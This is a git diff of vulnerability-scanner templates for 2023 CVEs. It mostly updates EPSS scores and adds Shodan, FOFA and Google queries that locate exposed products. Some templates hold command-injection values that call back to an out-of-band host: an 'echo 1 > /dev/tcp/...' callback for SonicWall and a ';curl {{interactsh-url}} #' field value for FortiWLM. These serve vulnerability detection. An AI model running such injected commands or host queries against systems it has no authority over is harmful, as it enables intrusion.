--- a/http/cves/2023/CVE-2023-3219.yaml +++ b/http/cves/2023/CVE-2023-3219.yaml @@ -19,8 +19,8 @@ info: cvss-score: 5.3 cve-id: CVE-2023-3219 cwe-id: CWE-639 - epss-score: 0.17304 - epss-percentile: 0.95981 + epss-score: 0.08542 + epss-percentile: 0.94439 cpe: cpe:2.3:a:myeventon:eventon:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -28,7 +28,10 @@ info: vendor: myeventon product: eventon framework: wordpress + shodan-query: http.html:/wp-content/plugins/eventon/ + fofa-query: wp-content/plugins/eventon/ publicwww-query: "/wp-content/plugins/eventon-lite/" + google-query: inurl:"/wp-content/plugins/eventon/" tags: cve,cve2023,wpscan,packetstorm,wordpress,wp-plugin,wp,eventon-lite,bypass,myeventon http: diff --git a/http/cves/2023/CVE-2023-32243.yaml b/http/cves/2023/CVE-2023-32243.yaml index 9578cfe944..a1ddc1903f 100644 --- a/http/cves/2023/CVE-2023-32243.yaml +++ b/http/cves/2023/CVE-2023-32243.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-32243 cwe-id: CWE-287 - epss-score: 0.03267 - epss-percentile: 0.91046 + epss-score: 0.08653 + epss-percentile: 0.94489 cpe: cpe:2.3:a:wpdeveloper:essential_addons_for_elementor:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-32315.yaml b/http/cves/2023/CVE-2023-32315.yaml index 26a48d8fe1..7c82376fb8 100644 --- a/http/cves/2023/CVE-2023-32315.yaml +++ b/http/cves/2023/CVE-2023-32315.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.5 cve-id: CVE-2023-32315 cwe-id: CWE-22 - epss-score: 0.97384 - epss-percentile: 0.99904 + epss-score: 0.97409 + epss-percentile: 0.99927 cpe: cpe:2.3:a:igniterealtime:openfire:*:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,8 @@ info: vendor: igniterealtime product: openfire shodan-query: title:"openfire" + fofa-query: title="openfire" + google-query: intitle:"openfire" tags: cve2023,cve,auth-bypass,openfire,console,kev,igniterealtime http: diff --git a/http/cves/2023/CVE-2023-32563.yaml b/http/cves/2023/CVE-2023-32563.yaml index 8b70377236..3b8370abe5 100644 --- a/http/cves/2023/CVE-2023-32563.yaml +++ b/http/cves/2023/CVE-2023-32563.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-32563 cwe-id: CWE-22 - epss-score: 0.43167 - epss-percentile: 0.97254 + epss-score: 0.34709 + epss-percentile: 0.97105 cpe: cpe:2.3:a:ivanti:avalanche:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2023/CVE-2023-33338.yaml b/http/cves/2023/CVE-2023-33338.yaml index 249fe93d11..1fb2c9f850 100644 --- a/http/cves/2023/CVE-2023-33338.yaml +++ b/http/cves/2023/CVE-2023-33338.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-33338 cwe-id: CWE-89 - epss-score: 0.0152 - epss-percentile: 0.8674 + epss-score: 0.01754 + epss-percentile: 0.87944 cpe: cpe:2.3:a:phpgurukul:old_age_home_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-33405.yaml b/http/cves/2023/CVE-2023-33405.yaml index aa6c4e6873..794a2e3ef7 100644 --- a/http/cves/2023/CVE-2023-33405.yaml +++ b/http/cves/2023/CVE-2023-33405.yaml @@ -25,6 +25,8 @@ info: max-request: 1 vendor: blogengine product: blogengine.net + shodan-query: http.html:"blogengine.net" + fofa-query: body="blogengine.net" tags: cve2023,cve,Blogengine,cms,redirect,blogengine http: diff --git a/http/cves/2023/CVE-2023-33439.yaml b/http/cves/2023/CVE-2023-33439.yaml index 804a38e40c..9b16725752 100644 --- a/http/cves/2023/CVE-2023-33439.yaml +++ b/http/cves/2023/CVE-2023-33439.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.2 cve-id: CVE-2023-33439 cwe-id: CWE-89 - epss-score: 0.00666 - epss-percentile: 0.79241 + epss-score: 0.00778 + epss-percentile: 0.81335 cpe: cpe:2.3:a:faculty_evaluation_system_project:faculty_evaluation_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-33440.yaml b/http/cves/2023/CVE-2023-33440.yaml index 0f5cb8901a..4f13c943c1 100644 --- a/http/cves/2023/CVE-2023-33440.yaml +++ b/http/cves/2023/CVE-2023-33440.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.2 cve-id: CVE-2023-33440 cwe-id: CWE-434 - epss-score: 0.08056 - epss-percentile: 0.93711 + epss-score: 0.07644 + epss-percentile: 0.94146 cpe: cpe:2.3:a:faculty_evaluation_system_project:faculty_evaluation_system:1.0:*:*:*:*:*:*:* metadata: verified: true @@ -30,7 +30,6 @@ info: vendor: faculty_evaluation_system_project product: faculty_evaluation_system tags: cve2023,cve,packetstorm,faculty,rce,intrusive,faculty_evaluation_system_project - variables: email: "{{randstr}}@{{rand_base(5)}}.com" string: "CVE-2023-33440" diff --git a/http/cves/2023/CVE-2023-3345.yaml b/http/cves/2023/CVE-2023-3345.yaml index 9004991282..4c02631ca1 100644 --- a/http/cves/2023/CVE-2023-3345.yaml +++ b/http/cves/2023/CVE-2023-3345.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.5 cve-id: CVE-2023-3345 cwe-id: CWE-200 - epss-score: 0.00235 - epss-percentile: 0.61522 + epss-score: 0.00446 + epss-percentile: 0.74935 cpe: cpe:2.3:a:masteriyo:masteriyo:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-33510.yaml b/http/cves/2023/CVE-2023-33510.yaml index cd7f863611..010c64efed 100644 --- a/http/cves/2023/CVE-2023-33510.yaml +++ b/http/cves/2023/CVE-2023-33510.yaml @@ -20,8 +20,8 @@ info: cvss-score: 7.5 cve-id: CVE-2023-33510 cwe-id: CWE-668 - epss-score: 0.00347 - epss-percentile: 0.6879 + epss-score: 0.00406 + epss-percentile: 0.73689 cpe: cpe:2.3:a:jeecg_p3_biz_chat_project:jeecg_p3_biz_chat:1.0.5:*:*:*:*:wordpress:*:* metadata: verified: "true" @@ -30,6 +30,7 @@ info: product: jeecg_p3_biz_chat framework: wordpress shodan-query: http.favicon.hash:1380908726 + fofa-query: icon_hash=1380908726 tags: cve2023,cve,jeecg,lfi,jeecg_p3_biz_chat_project,wordpress http: diff --git a/http/cves/2023/CVE-2023-33568.yaml b/http/cves/2023/CVE-2023-33568.yaml index 69f89cf485..bd1a73705a 100644 --- a/http/cves/2023/CVE-2023-33568.yaml +++ b/http/cves/2023/CVE-2023-33568.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.5 cve-id: CVE-2023-33568 cwe-id: CWE-552 - epss-score: 0.62868 - epss-percentile: 0.97558 + epss-score: 0.4855 + epss-percentile: 0.97483 cpe: cpe:2.3:a:dolibarr:dolibarr_erp\/crm:*:*:*:*:*:*:*:* metadata: verified: "true" @@ -30,6 +30,7 @@ info: vendor: dolibarr product: dolibarr_erp\/crm shodan-query: http.favicon.hash:440258421 + fofa-query: icon_hash=440258421 tags: cve2023,cve,dolibarr,unauth http: diff --git a/http/cves/2023/CVE-2023-33584.yaml b/http/cves/2023/CVE-2023-33584.yaml index 2d6c0d98ac..328e959999 100644 --- a/http/cves/2023/CVE-2023-33584.yaml +++ b/http/cves/2023/CVE-2023-33584.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-33584 cwe-id: CWE-89 - epss-score: 0.09977 - epss-percentile: 0.94731 + epss-score: 0.06893 + epss-percentile: 0.93907 cpe: cpe:2.3:a:enrollment_system_project:enrollment_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-33629.yaml b/http/cves/2023/CVE-2023-33629.yaml index 9d1ec8f566..c20fbd45bb 100644 --- a/http/cves/2023/CVE-2023-33629.yaml +++ b/http/cves/2023/CVE-2023-33629.yaml @@ -16,8 +16,8 @@ info: cvss-score: 7.2 cve-id: CVE-2023-33629 cwe-id: CWE-787 - epss-score: 0.00968 - epss-percentile: 0.82988 + epss-score: 0.01254 + epss-percentile: 0.85534 cpe: cpe:2.3:o:h3c:magic_r300-2100m_firmware:r300-2100mv100r004:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-3368.yaml b/http/cves/2023/CVE-2023-3368.yaml index ccf1544419..85b6d868c2 100644 --- a/http/cves/2023/CVE-2023-3368.yaml +++ b/http/cves/2023/CVE-2023-3368.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-3368 cwe-id: CWE-78 - epss-score: 0.76057 - epss-percentile: 0.97911 + epss-score: 0.93283 + epss-percentile: 0.99063 cpe: cpe:2.3:a:chamilo:chamilo:*:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2023/CVE-2023-33831.yaml b/http/cves/2023/CVE-2023-33831.yaml index 2bc8975120..8c7e47e1c5 100644 --- a/http/cves/2023/CVE-2023-33831.yaml +++ b/http/cves/2023/CVE-2023-33831.yaml @@ -16,8 +16,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-33831 cwe-id: CWE-77 - epss-score: 0.04822 - epss-percentile: 0.91961 + epss-score: 0.21555 + epss-percentile: 0.96432 cpe: cpe:2.3:a:frangoteam:fuxa:1.1.13:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2023/CVE-2023-34020.yaml b/http/cves/2023/CVE-2023-34020.yaml index 823a82a3bb..7b7c314455 100644 --- a/http/cves/2023/CVE-2023-34020.yaml +++ b/http/cves/2023/CVE-2023-34020.yaml @@ -3,12 +3,20 @@ id: CVE-2023-34020 info: name: Uncanny Toolkit for LearnDash - Open Redirection author: LeDoubleTake - severity: low + severity: medium description: | A vulnerability in the WordPress Uncanny Toolkit for LearnDash Plugin allowed malicious actors to redirect users, posing a potential risk of phishing incidents. The issue has been resolved in version 3.6.4.4, and users are urged to update for security. reference: - https://patchstack.com/database/vulnerability/uncanny-learndash-toolkit/wordpress-uncanny-toolkit-for-learndash-plugin-3-6-4-3-open-redirection-vulnerability - https://wordpress.org/plugins/uncanny-learndash-toolkit/ + - https://patchstack.com/database/vulnerability/uncanny-learndash-toolkit/wordpress-uncanny-toolkit-for-learndash-plugin-3-6-4-3-open-redirection-vulnerability?_s_id=cve + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N + cvss-score: 4.7 + cve-id: CVE-2023-34020 + cwe-id: CWE-601 + epss-score: 0.00076 + epss-percentile: 0.32361 metadata: verified: true max-request: 1 diff --git a/http/cves/2023/CVE-2023-34124.yaml b/http/cves/2023/CVE-2023-34124.yaml index e5f230a074..e9e0046db9 100644 --- a/http/cves/2023/CVE-2023-34124.yaml +++ b/http/cves/2023/CVE-2023-34124.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-34124 cwe-id: CWE-287,CWE-305 - epss-score: 0.0172 - epss-percentile: 0.87553 + epss-score: 0.03433 + epss-percentile: 0.91476 cpe: cpe:2.3:a:sonicwall:analytics:*:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,7 @@ info: vendor: sonicwall product: analytics shodan-query: http.favicon.hash:-1381126564 + fofa-query: icon_hash=-1381126564 tags: cve2023,cve,sonicwall,shell,injection,auth-bypass,instrusive variables: callback: "echo 1 > /dev/tcp/{{interactsh-url}}/80" diff --git a/http/cves/2023/CVE-2023-34259.yaml b/http/cves/2023/CVE-2023-34259.yaml index 339c29a255..b7e9c7e166 100644 --- a/http/cves/2023/CVE-2023-34259.yaml +++ b/http/cves/2023/CVE-2023-34259.yaml @@ -19,8 +19,8 @@ info: cvss-score: 4.9 cve-id: CVE-2023-34259 cwe-id: CWE-22 - epss-score: 0.00554 - epss-percentile: 0.77111 + epss-score: 0.00559 + epss-percentile: 0.77589 cpe: cpe:2.3:o:kyocera:d-copia253mf_plus_firmware:*:*:*:*:*:*:*:* metadata: verified: true @@ -28,6 +28,7 @@ info: vendor: kyocera product: d-copia253mf_plus_firmware shodan-query: http.favicon.hash:-50306417 + fofa-query: icon_hash=-50306417 tags: cve,cve2023,packetstorm,seclists,kyocera,lfi,printer http: diff --git a/http/cves/2023/CVE-2023-34362.yaml b/http/cves/2023/CVE-2023-34362.yaml index 19d090b842..406fc7064e 100644 --- a/http/cves/2023/CVE-2023-34362.yaml +++ b/http/cves/2023/CVE-2023-34362.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-34362 cwe-id: CWE-89 - epss-score: 0.95418 - epss-percentile: 0.99231 + epss-score: 0.95916 + epss-percentile: 0.99457 cpe: cpe:2.3:a:progress:moveit_cloud:*:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,7 @@ info: vendor: progress product: moveit_cloud shodan-query: http.favicon.hash:989289239 + fofa-query: icon_hash=989289239 tags: cve2023,cve,packetstorm,moveit,rce,sqli,intrusive,kev,progress variables: sessioncookie: "{{randstr}}" diff --git a/http/cves/2023/CVE-2023-34537.yaml b/http/cves/2023/CVE-2023-34537.yaml index e7dcc114c3..8f929d6583 100644 --- a/http/cves/2023/CVE-2023-34537.yaml +++ b/http/cves/2023/CVE-2023-34537.yaml @@ -13,19 +13,24 @@ info: reference: - https://github.com/leekenghwa/CVE-2023-34537---XSS-reflected--found-in-HotelDruid-3.0.5 - https://nvd.nist.gov/vuln/detail/CVE-2023-34537 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/nomi-sec/PoC-in-GitHub classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cve-id: CVE-2023-34537 cwe-id: CWE-79 - epss-score: 0.0007 - epss-percentile: 0.28902 + epss-score: 0.00084 + epss-percentile: 0.35673 cpe: cpe:2.3:a:digitaldruid:hoteldruid:3.0.5:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: digitaldruid product: hoteldruid + shodan-query: http.title:"hoteldruid" + fofa-query: title="hoteldruid" + google-query: intitle:"hoteldruid" tags: cve2023,cve,hoteldrui,xss,authenticated,digitaldruid http: diff --git a/http/cves/2023/CVE-2023-34598.yaml b/http/cves/2023/CVE-2023-34598.yaml index 72cedccfb6..63628bf4ec 100644 --- a/http/cves/2023/CVE-2023-34598.yaml +++ b/http/cves/2023/CVE-2023-34598.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-34598 cwe-id: CWE-22 - epss-score: 0.03342 - epss-percentile: 0.9114 + epss-score: 0.02842 + epss-percentile: 0.90694 cpe: cpe:2.3:a:gibbonedu:gibbon:25.0.00:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-34599.yaml b/http/cves/2023/CVE-2023-34599.yaml index dfabd8690a..a54eff2245 100644 --- a/http/cves/2023/CVE-2023-34599.yaml +++ b/http/cves/2023/CVE-2023-34599.yaml @@ -13,19 +13,23 @@ info: reference: - https://github.com/maddsec/CVE-2023-34599 - https://vulmon.com/searchpage?q=CVE-2023-34599 + - https://github.com/Imahian/CVE-2023-34599 + - https://github.com/hheeyywweellccoommee/CVE-2023-34599-xsddo + - https://github.com/nomi-sec/PoC-in-GitHub classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2023-34599 cwe-id: CWE-79 epss-score: 0.00071 - epss-percentile: 0.29205 + epss-percentile: 0.30482 cpe: cpe:2.3:a:gibbonedu:gibbon:25.0.00:*:*:*:*:*:*:* metadata: max-request: 2 vendor: gibbonedu product: gibbon shodan-query: http.favicon.hash:-165631681 + fofa-query: icon_hash="-165631681" tags: cve2023,cve,gibbon,xss,authenticated,intrusive,gibbonedu http: diff --git a/http/cves/2023/CVE-2023-3460.yaml b/http/cves/2023/CVE-2023-3460.yaml index 13662666d8..9d5d784e8e 100644 --- a/http/cves/2023/CVE-2023-3460.yaml +++ b/http/cves/2023/CVE-2023-3460.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-3460 cwe-id: CWE-269 - epss-score: 0.08148 - epss-percentile: 0.93712 + epss-score: 0.06326 + epss-percentile: 0.93621 cpe: cpe:2.3:a:ultimatemember:ultimate_member:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -30,6 +30,8 @@ info: vendor: ultimatemember product: ultimate_member framework: wordpress + shodan-query: http.html:/wp-content/plugins/ultimate-member + fofa-query: body=/wp-content/plugins/ultimate-member publicwww-query: /wp-content/plugins/ultimate-member google-query: inurl:/wp-content/plugins/ultimate-member tags: cve,cve2023,wordpress,wp,wp-plugin,auth-bypass,intrusive,wpscan,ultimatemember diff --git a/http/cves/2023/CVE-2023-34659.yaml b/http/cves/2023/CVE-2023-34659.yaml index 867bbb630c..d86ab04fb3 100644 --- a/http/cves/2023/CVE-2023-34659.yaml +++ b/http/cves/2023/CVE-2023-34659.yaml @@ -19,14 +19,15 @@ info: cvss-score: 9.8 cve-id: CVE-2023-34659 cwe-id: CWE-89 - epss-score: 0.21629 - epss-percentile: 0.96326 + epss-score: 0.40226 + epss-percentile: 0.97268 cpe: cpe:2.3:a:jeecg:jeecg_boot:3.5.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: jeecg product: jeecg_boot shodan-query: http.favicon.hash:1380908726 + fofa-query: icon_hash=1380908726 tags: cve2023,cve,jeecg,sqli http: diff --git a/http/cves/2023/CVE-2023-34751.yaml b/http/cves/2023/CVE-2023-34751.yaml index 9edc4bae5e..55e4298a76 100644 --- a/http/cves/2023/CVE-2023-34751.yaml +++ b/http/cves/2023/CVE-2023-34751.yaml @@ -15,8 +15,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-34751 cwe-id: CWE-89 - epss-score: 0.02354 - epss-percentile: 0.89556 + epss-score: 0.0257 + epss-percentile: 0.90221 cpe: cpe:2.3:a:bloofox:bloofoxcms:0.5.2.1:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2023/CVE-2023-34752.yaml b/http/cves/2023/CVE-2023-34752.yaml index 8eee0e5231..2f1236d64e 100644 --- a/http/cves/2023/CVE-2023-34752.yaml +++ b/http/cves/2023/CVE-2023-34752.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-34752 cwe-id: CWE-89 - epss-score: 0.0945 - epss-percentile: 0.9459 + epss-score: 0.14896 + epss-percentile: 0.95799 cpe: cpe:2.3:a:bloofox:bloofoxcms:0.5.2.1:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2023/CVE-2023-34753.yaml b/http/cves/2023/CVE-2023-34753.yaml index 6d1d4d166c..3d933c4083 100644 --- a/http/cves/2023/CVE-2023-34753.yaml +++ b/http/cves/2023/CVE-2023-34753.yaml @@ -15,8 +15,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-34753 cwe-id: CWE-89 - epss-score: 0.02354 - epss-percentile: 0.89556 + epss-score: 0.0257 + epss-percentile: 0.90221 cpe: cpe:2.3:a:bloofox:bloofoxcms:0.5.2.1:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2023/CVE-2023-34755.yaml b/http/cves/2023/CVE-2023-34755.yaml index a92f5f1025..85c0786203 100644 --- a/http/cves/2023/CVE-2023-34755.yaml +++ b/http/cves/2023/CVE-2023-34755.yaml @@ -15,8 +15,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-34755 cwe-id: CWE-89 - epss-score: 0.01254 - epss-percentile: 0.84129 + epss-score: 0.0257 + epss-percentile: 0.90221 cpe: cpe:2.3:a:bloofox:bloofoxcms:0.5.2.1:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2023/CVE-2023-34756.yaml b/http/cves/2023/CVE-2023-34756.yaml index b5bebab94f..975dbb1e81 100644 --- a/http/cves/2023/CVE-2023-34756.yaml +++ b/http/cves/2023/CVE-2023-34756.yaml @@ -15,8 +15,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-34756 cwe-id: CWE-89 - epss-score: 0.02354 - epss-percentile: 0.89556 + epss-score: 0.0257 + epss-percentile: 0.90221 cpe: cpe:2.3:a:bloofox:bloofoxcms:0.5.2.1:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-3479.yaml b/http/cves/2023/CVE-2023-3479.yaml index 365467b10d..f84ce59c9e 100644 --- a/http/cves/2023/CVE-2023-3479.yaml +++ b/http/cves/2023/CVE-2023-3479.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2023-3479 cwe-id: CWE-79 epss-score: 0.0007 - epss-percentile: 0.28961 + epss-percentile: 0.30234 cpe: cpe:2.3:a:hestiacp:control_panel:*:*:*:*:*:*:*:* metadata: verified: true @@ -28,6 +28,8 @@ info: vendor: hestiacp product: control_panel shodan-query: http.favicon.hash:-476299640 + fofa-query: title="hestia control panel" + google-query: intitle:"hestia control panel" tags: cve2023,cve,huntr,hestiacp,xss,intrusive http: diff --git a/http/cves/2023/CVE-2023-34843.yaml b/http/cves/2023/CVE-2023-34843.yaml index 668506d369..2dab5b6922 100644 --- a/http/cves/2023/CVE-2023-34843.yaml +++ b/http/cves/2023/CVE-2023-34843.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.5 cve-id: CVE-2023-34843 cwe-id: CWE-22 - epss-score: 0.00349 - epss-percentile: 0.71237 + epss-score: 0.00357 + epss-percentile: 0.72064 cpe: cpe:2.3:a:traggo:traggo:0.3.0:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,7 @@ info: vendor: traggo product: traggo shodan-query: html:"traggo" + fofa-query: body="traggo" tags: cve2023,cve,traggo,lfi,server http: diff --git a/http/cves/2023/CVE-2023-34960.yaml b/http/cves/2023/CVE-2023-34960.yaml index 5b92ad6570..a0c18ba776 100644 --- a/http/cves/2023/CVE-2023-34960.yaml +++ b/http/cves/2023/CVE-2023-34960.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-34960 cwe-id: CWE-77 - epss-score: 0.93541 - epss-percentile: 0.99046 + epss-score: 0.93314 + epss-percentile: 0.99067 cpe: cpe:2.3:a:chamilo:chamilo:*:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2023/CVE-2023-34993.yaml b/http/cves/2023/CVE-2023-34993.yaml index 3016937624..6b24fab5c1 100644 --- a/http/cves/2023/CVE-2023-34993.yaml +++ b/http/cves/2023/CVE-2023-34993.yaml @@ -16,13 +16,22 @@ info: reference: - https://fortiguard.com/psirt/FG-IR-23-140 - https://www.horizon3.ai/attack-research/attack-blogs/fortiwlm-the-almost-story-for-the-forti-forty/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2023-34993 + cwe-id: CWE-78 + epss-score: 0.96644 + epss-percentile: 0.99631 + cpe: cpe:2.3:a:fortinet:fortiwlm:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: fortinet product: fortiwlm shodan-query: http.title:"FortiWLM" + fofa-query: body="fortiwlm" + google-query: intitle:"fortiwlm" tags: cve,cve2023,fortinet,fortiwlm,rce,unauth - variables: progressfile: '{{rand_base(5)}};curl {{interactsh-url}} #' # -F "file=/data/apps/nms/logs/httpd_error_log" diff --git a/http/cves/2023/CVE-2023-35078.yaml b/http/cves/2023/CVE-2023-35078.yaml index 17a14dd29e..4ca1beb09a 100644 --- a/http/cves/2023/CVE-2023-35078.yaml +++ b/http/cves/2023/CVE-2023-35078.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-35078 cwe-id: CWE-287 - epss-score: 0.94864 - epss-percentile: 0.99112 + epss-score: 0.96825 + epss-percentile: 0.99689 cpe: cpe:2.3:a:ivanti:endpoint_manager_mobile:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-35082.yaml b/http/cves/2023/CVE-2023-35082.yaml index 7851495228..c7e16c73e4 100644 --- a/http/cves/2023/CVE-2023-35082.yaml +++ b/http/cves/2023/CVE-2023-35082.yaml @@ -13,13 +13,15 @@ info: - https://www.rapid7.com/blog/post/2023/08/02/cve-2023-35082-mobileiron-core-unauthenticated-api-access-vulnerability/ - https://nvd.nist.gov/vuln/detail/CVE-2023-35082 - https://forums.ivanti.com/s/article/CVE-2023-35082-Remote-Unauthenticated-API-Access-Vulnerability-in-MobileIron-Core-11-2-and-older?language=en_US + - https://github.com/Chocapikk/CVE-2023-35082 + - https://github.com/Ostorlab/KEV classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-35082 cwe-id: CWE-287 - epss-score: 0.07991 - epss-percentile: 0.93656 + epss-score: 0.96732 + epss-percentile: 0.9966 cpe: cpe:2.3:a:ivanti:endpoint_manager_mobile:*:*:*:*:*:*:*:* metadata: verified: true @@ -28,7 +30,7 @@ info: product: endpoint_manager_mobile shodan-query: http.favicon.hash:362091310 fofa-query: icon_hash="362091310" - tags: cve2023,cve,ivanti,mobileiron,epmm + tags: cve2023,cve,ivanti,mobileiron,epmm,kev http: - method: GET diff --git a/http/cves/2023/CVE-2023-35158.yaml b/http/cves/2023/CVE-2023-35158.yaml index cec2140f85..6ddc352321 100644 --- a/http/cves/2023/CVE-2023-35158.yaml +++ b/http/cves/2023/CVE-2023-35158.yaml @@ -17,8 +17,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-35158 cwe-id: CWE-87 - epss-score: 0.00105 - epss-percentile: 0.42103 + epss-score: 0.62633 + epss-percentile: 0.97829 cpe: cpe:2.3:a:xwiki:xwiki:*:*:*:*:*:*:*:* metadata: verified: true @@ -26,6 +26,7 @@ info: vendor: xwiki product: xwiki shodan-query: "XWiki" + fofa-query: body="data-xwiki-reference" tags: cve,cve2023,xwiki,xss http: diff --git a/http/cves/2023/CVE-2023-35813.yaml b/http/cves/2023/CVE-2023-35813.yaml index 4f3d631987..42ae14df18 100644 --- a/http/cves/2023/CVE-2023-35813.yaml +++ b/http/cves/2023/CVE-2023-35813.yaml @@ -17,14 +17,16 @@ info: cvss-score: 9.8 cve-id: CVE-2023-35813 cwe-id: CWE-22,CWE-23 - epss-score: 0.72023 - epss-percentile: 0.97805 + epss-score: 0.8819 + epss-percentile: 0.98674 cpe: cpe:2.3:a:sitecore:experience_commerce:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: sitecore product: experience_commerce shodan-query: title:"Sitecore" + fofa-query: title="sitecore" + google-query: intitle:"sitecore" tags: cve2023,cve,sitecore,rce variables: string: "{{rand_base(6)}}" diff --git a/http/cves/2023/CVE-2023-35843.yaml b/http/cves/2023/CVE-2023-35843.yaml index f3ed2f48c3..f2adc64f35 100644 --- a/http/cves/2023/CVE-2023-35843.yaml +++ b/http/cves/2023/CVE-2023-35843.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.5 cve-id: CVE-2023-35843 cwe-id: CWE-22 - epss-score: 0.03299 - epss-percentile: 0.91091 + epss-score: 0.06332 + epss-percentile: 0.93628 cpe: cpe:2.3:a:nocodb:nocodb:*:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,7 @@ info: vendor: nocodb product: nocodb shodan-query: http.favicon.hash:-2017596142 + fofa-query: icon_hash=-2017596142 tags: cve2023,cve,nocodb,lfi http: diff --git a/http/cves/2023/CVE-2023-35844.yaml b/http/cves/2023/CVE-2023-35844.yaml index 76e5b32c83..c21afb2f8a 100644 --- a/http/cves/2023/CVE-2023-35844.yaml +++ b/http/cves/2023/CVE-2023-35844.yaml @@ -33,6 +33,8 @@ info: vendor: lightdash product: lightdash shodan-query: title:"Lightdash" + fofa-query: title="lightdash" + google-query: intitle:"lightdash" tags: cve,cve2023,lightdash,lfi http: diff --git a/http/cves/2023/CVE-2023-35885.yaml b/http/cves/2023/CVE-2023-35885.yaml index 3cab287c26..0c7a1c2d1c 100644 --- a/http/cves/2023/CVE-2023-35885.yaml +++ b/http/cves/2023/CVE-2023-35885.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-35885 cwe-id: CWE-565 - epss-score: 0.02964 - epss-percentile: 0.89873 + epss-score: 0.48073 + epss-percentile: 0.97467 cpe: cpe:2.3:a:mgt-commerce:cloudpanel:*:*:*:*:*:*:*:* metadata: verified: true @@ -30,8 +30,9 @@ info: vendor: mgt-commerce product: cloudpanel shodan-query: title:"Cloudpanel" + fofa-query: icon_hash="151132309" + google-query: intitle:"cloudpanel" tags: cve2023,cve,cloudpanel,rce,intrusive,mgt-commerce,fileupload - variables: session: "ZGVmNTAyMDA3ZDI0OGNjZmU0NTVkMGQ2NmJhMjUxYjdhYzg0NzcyYzBmNjM0ODg0ODY0OWYyZTQ0MjgwZDVjZDBjNmY3MWJiZWU4ZTM4OTU4ZmE4YjViNjE4MGJiZjQ4NzA3MzcwNTJiNzFhM2JjYTBmNTdiODQ4ZDZjYjhiNmY1N2U3YTM1YWY3YjA3MTM1ZTlkYjViMjY5OTkzM2Q3NTAyOWI0ZGQ5ZDZmOTFhYTVlZTRhZjg0ZTBmZTU5NjY4NGI4OGU0NjVkNDU4MWYxOTc2MGNiMGI0ZGY2MmZjM2RkMmI4N2RhMzJkYTU4NjNjMWFmMGZlOWIwZjcyZGRkNmFhYzk3ZGVlZmY=" str1: "{{rand_base(10)}}" diff --git 